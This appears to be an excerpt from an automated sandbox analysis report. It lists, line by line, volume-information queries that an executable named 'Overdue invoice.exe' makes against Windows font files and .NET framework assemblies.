                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Users\user\Desktop\Overdue invoice.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
